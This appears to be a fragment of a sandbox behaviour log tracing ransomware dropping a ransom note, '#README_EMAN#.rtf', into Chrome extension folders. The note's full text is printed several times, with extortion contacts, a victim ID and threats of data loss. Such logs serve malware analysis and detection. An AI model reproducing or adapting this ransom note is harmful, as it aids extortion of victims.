nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.067] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.068] CloseHandle (hObject=0x294) returned 1 [0285.068] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\#readme_eman#.rtf")) returned 0xffffffff [0285.068] GetLastError () returned 0x2 [0285.068] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.069] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.069] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.069] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * 